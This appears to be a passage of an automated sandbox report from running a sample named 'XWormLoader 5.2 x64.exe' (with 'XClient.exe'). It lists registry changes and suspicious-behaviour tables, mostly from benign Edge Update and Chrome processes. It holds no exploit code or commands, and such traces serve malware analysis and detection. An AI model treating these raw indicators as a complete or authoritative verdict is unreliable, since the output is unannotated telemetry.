Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{450CF5FF-95C4-4679-BECA-22680389ECB9}\NumMethods\ = "10" C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.187.37\MicrosoftEdgeUpdateComRegisterShell64.exe N/A
Key created \REGISTRY\MACHINE\Software\Classes\MSEdgeMHT\shell\runas\command C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{5CA352B5-53F7-4525-9241-D14C8DE4FB33}\EDGEMITMP_229F7.tmp\setup.exe N/A
Key created \REGISTRY\MACHINE\Software\Classes\.svg\OpenWithProgids C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{5CA352B5-53F7-4525-9241-D14C8DE4FB33}\EDGEMITMP_229F7.tmp\setup.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{3A84F9C2-6164-485C-A7D9-4B27F8AC009E}\InProcServer32\ThreadingModel = "Apartment" C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{5CA352B5-53F7-4525-9241-D14C8DE4FB33}\EDGEMITMP_229F7.tmp\setup.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{7E29BE61-5809-443F-9B5D-CF22156694EB}\NumMethods C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.187.37\MicrosoftEdgeUpdateComRegisterShell64.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{3A49F783-1C7D-4D35-8F63-5C1C206B9B6E}\ProxyStubClsid32\ = "{4E50ED6A-8A46-4CB9-9E77-B99CBFED1E68}" C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.187.37\MicrosoftEdgeUpdateComRegisterShell64.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\MicrosoftEdgeUpdate.Update3WebSvc\ = "Microsoft Edge Update Update3Web" C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{837E40DA-EB1B-440C-8623-0F14DF158DC0}\NumMethods\ = "24" C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{195A2EB3-21EE-43CA-9F23-93C2C9934E2E}\ = "IApp" C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.187.37\MicrosoftEdgeUpdateComRegisterShell64.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{177CAE89-4AD6-42F4-A458-00EC3389E3FE}\ = "ICurrentState" C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.187.37\MicrosoftEdgeUpdateComRegisterShell64.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{A6556DFF-AB15-4DC3-A890-AB54120BEAEC}\ProxyStubClsid32 C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{FEA2518F-758F-4B95-A59F-97FCEEF1F5D0}\ProxyStubClsid32 C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.187.37\MicrosoftEdgeUpdateComRegisterShell64.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\CLASSES\WOW6432NODE\CLSID\{FF419FF9-90BE-4D9F-B410-A789F90E5A7C}\PROGID C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{3A84F9C2-6164-485C-A7D9-4B27F8AC009E}\AppID = "{6d2b5079-2f0b-48dd-ab7f-97cec514d30b}" C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{5CA352B5-53F7-4525-9241-D14C8DE4FB33}\EDGEMITMP_229F7.tmp\setup.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{CECDDD22-2E72-4832-9606-A9B0E5E344B2}\ProgID C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\MicrosoftEdgeUpdate.PolicyStatusMachine\CurVer\ = "MicrosoftEdgeUpdate.PolicyStatusMachine.1.0" C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\8\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259} C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{5CA352B5-53F7-4525-9241-D14C8DE4FB33}\EDGEMITMP_229F7.tmp\setup.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{9E8F1B36-249F-4FC3-9994-974AFAA07B26}\InprocServer32 C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.187.37\MicrosoftEdgeUpdateComRegisterShell64.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{7B3B7A69-7D88-4847-A6BC-90E246A41F69}\NumMethods C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.187.37\MicrosoftEdgeUpdateComRegisterShell64.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{DDD4B5D4-FD54-497C-8789-0830F29A60EE} C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.187.37\MicrosoftEdgeUpdateComRegisterShell64.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{A5135E58-384F-4244-9A5F-30FA9259413C}\ProxyStubClsid32 C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{C06EE550-7248-488E-971E-B60C0AB3A6E4}\ = "IApp2" C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.187.37\MicrosoftEdgeUpdateComRegisterShell64.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{2603C88B-F971-4167-9DE1-871EE4A3DC84}\ProxyStubClsid32\ = "{4E50ED6A-8A46-4CB9-9E77-B99CBFED1E68}" C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.187.37\MicrosoftEdgeUpdateComRegisterShell64.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{DDD4B5D4-FD54-497C-8789-0830F29A60EE}\NumMethods\ = "10" C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.187.37\MicrosoftEdgeUpdateComRegisterShell64.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftofficehub_8wekyb3d8bbwe\Internet Settings\Cache\Cookies\CachePrefix = "Cookie:" C:\Windows\system32\wwahost.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000_Classes\Local Settings C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{9E8F1B36-249F-4FC3-9994-974AFAA07B26} C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.187.37\MicrosoftEdgeUpdateComRegisterShell64.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{9E8F1B36-249F-4FC3-9994-974AFAA07B26} C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.187.37\MicrosoftEdgeUpdateComRegisterShell64.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{195A2EB3-21EE-43CA-9F23-93C2C9934E2E}\ProxyStubClsid32\ = "{4E50ED6A-8A46-4CB9-9E77-B99CBFED1E68}" C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.187.37\MicrosoftEdgeUpdateComRegisterShell64.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{5F9C80B5-9E50-43C9-887C-7C6412E110DF}\ProxyStubClsid32 C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.187.37\MicrosoftEdgeUpdateComRegisterShell64.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{9E8F1B36-249F-4FC3-9994-974AFAA07B26}\InprocServer32\ThreadingModel = "Both" C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.187.37\MicrosoftEdgeUpdateComRegisterShell64.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{AB4EE1FC-0A81-4F56-B0E2-248FB78051AF}\NumMethods\ = "23" C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.187.37\MicrosoftEdgeUpdateComRegisterShell64.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1FD49718-1D00-4B19-AF5F-070AF6D5D54C}\InprocServer32\ C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{5CA352B5-53F7-4525-9241-D14C8DE4FB33}\EDGEMITMP_229F7.tmp\setup.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{195A2EB3-21EE-43CA-9F23-93C2C9934E2E}\ = "IApp" C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\MicrosoftEdgeUpdate.CredentialDialogMachine.1.0\ = "Microsoft Edge Update CredentialDialog" C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\ C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\10\ComDlg\{CD0FC69B-71E2-46E5-9690-5BCD9F57AAB3} C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\8\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\GroupByDirection = "4294967295" C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftofficehub_8wekyb3d8bbwe\Internet Settings\Cache\History C:\Windows\system32\wwahost.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{AB4F4A7E-977C-4E23-AD8F-626A491715DF}\ProxyStubClsid32 C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.187.37\MicrosoftEdgeUpdateComRegisterShell64.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{60355531-5BFD-45AB-942C-7912628752C7}\NumMethods\ = "24" C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{C06EE550-7248-488E-971E-B60C0AB3A6E4} C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.187.37\MicrosoftEdgeUpdateComRegisterShell64.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{D9AA3288-4EA7-4E67-AE60-D18EADCB923D}\ProxyStubClsid32\ = "{4E50ED6A-8A46-4CB9-9E77-B99CBFED1E68}" C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.187.37\MicrosoftEdgeUpdateComRegisterShell64.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{AB4EE1FC-0A81-4F56-B0E2-248FB78051AF}\ProxyStubClsid32 C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.187.37\MicrosoftEdgeUpdateComRegisterShell64.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{C853632E-36CA-4999-B992-EC0D408CF5AB}\NumMethods C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.187.37\MicrosoftEdgeUpdateComRegisterShell64.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{7584D24A-E056-4EB1-8E7B-632F2B0ADC69}\ProxyStubClsid32 C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.187.37\MicrosoftEdgeUpdateComRegisterShell64.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\CLASSES\WOW6432NODE\CLSID\{2E1DD7EF-C12D-4F8E-8AD8-CF8CC265BAD0}\PROGID C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\GroupByDirection = "1" C:\Users\Admin\Desktop\XWorm V5.2\XWormLoader 5.2 x64.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{79E0C401-B7BC-4DE5-8104-71350F3A9B67}\ = "IGoogleUpdate" C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000_Classes\Local Settings C:\Users\Admin\Desktop\XClient.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{837E40DA-EB1B-440C-8623-0F14DF158DC0}\NumMethods C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe N/A

Suspicious behavior: AddClipboardFormatListener

Description Indicator Process Target
N/A N/A C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE N/A
N/A N/A C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Temp\EU46C6.tmp\MicrosoftEdgeUpdate.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Temp\EU46C6.tmp\MicrosoftEdgeUpdate.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Temp\EU46C6.tmp\MicrosoftEdgeUpdate.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Temp\EU46C6.tmp\MicrosoftEdgeUpdate.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Temp\EU46C6.tmp\MicrosoftEdgeUpdate.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Temp\EU46C6.tmp\MicrosoftEdgeUpdate.exe N/A
N/A N/A C:\Users\Admin\Desktop\XWorm V5.2\XWormLoader 5.2 x64.exe N/A
N/A N/A C:\Users\Admin\Desktop\XWorm V5.2\XWormLoader 5.2 x64.exe N/A
N/A N/A C:\Users\Admin\Desktop\XWorm V5.2\XWormLoader 5.2 x64.exe N/A
N/A N/A C:\Users\Admin\Desktop\XWorm V5.2\XWormLoader 5.2 x64.exe N/A
N/A N/A C:\Users\Admin\Desktop\XWorm V5.2\XWormLoader 5.2 x64.exe N/A
N/A N/A C:\Users\Admin\Desktop\XWorm V5.2\XWormLoader 5.2 x64.exe N/A
N/A N/A C:\Users\Admin\Desktop\XWorm V5.2\XWormLoader 5.2 x64.exe N/A
N/A N/A C:\Users\Admin\Desktop\XWorm V5.2\XWormLoader 5.2 x64.exe N/A
N/A N/A C:\Users\Admin\Desktop\XWorm V5.2\XWormLoader 5.2 x64.exe N/A
N/A N/A C:\Users\Admin\Desktop\XWorm V5.2\XWormLoader 5.2 x64.exe N/A
N/A N/A C:\Users\Admin\Desktop\XWorm V5.2\XWormLoader 5.2 x64.exe N/A
N/A N/A C:\Users\Admin\Desktop\XWorm V5.2\XWormLoader 5.2 x64.exe N/A
N/A N/A C:\Users\Admin\Desktop\XWorm V5.2\XWormLoader 5.2 x64.exe N/A
N/A N/A C:\Users\Admin\Desktop\XWorm V5.2\XWormLoader 5.2 x64.exe N/A
N/A N/A C:\Users\Admin\Desktop\XWorm V5.2\XWormLoader 5.2 x64.exe N/A
N/A N/A C:\Users\Admin\Desktop\XWorm V5.2\XWormLoader 5.2 x64.exe N/A
N/A N/A C:\Users\Admin\Desktop\XWorm V5.2\XWormLoader 5.2 x64.exe N/A
N/A N/A C:\Users\Admin\Desktop\XWorm V5.2\XWormLoader 5.2 x64.exe N/A
N/A N/A C:\Users\Admin\Desktop\XWorm V5.2\XWormLoader 5.2 x64.exe N/A
N/A N/A C:\Users\Admin\Desktop\XWorm V5.2\XWormLoader 5.2 x64.exe N/A
N/A N/A C:\Users\Admin\Desktop\XWorm V5.2\XWormLoader 5.2 x64.exe N/A
N/A N/A C:\Users\Admin\Desktop\XWorm V5.2\XWormLoader 5.2 x64.exe N/A
N/A N/A C:\Users\Admin\Desktop\XWorm V5.2\XWormLoader 5.2 x64.exe N/A
N/A N/A C:\Users\Admin\Desktop\XWorm V5.2\XWormLoader 5.2 x64.exe N/A
N/A N/A C:\Users\Admin\Desktop\XWorm V5.2\XWormLoader 5.2 x64.exe N/A
N/A N/A C:\Users\Admin\Desktop\XWorm V5.2\XWormLoader 5.2 x64.exe N/A
N/A N/A C:\Users\Admin\Desktop\XWorm V5.2\XWormLoader 5.2 x64.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe N/A

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary

Description Indicator Process Target
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
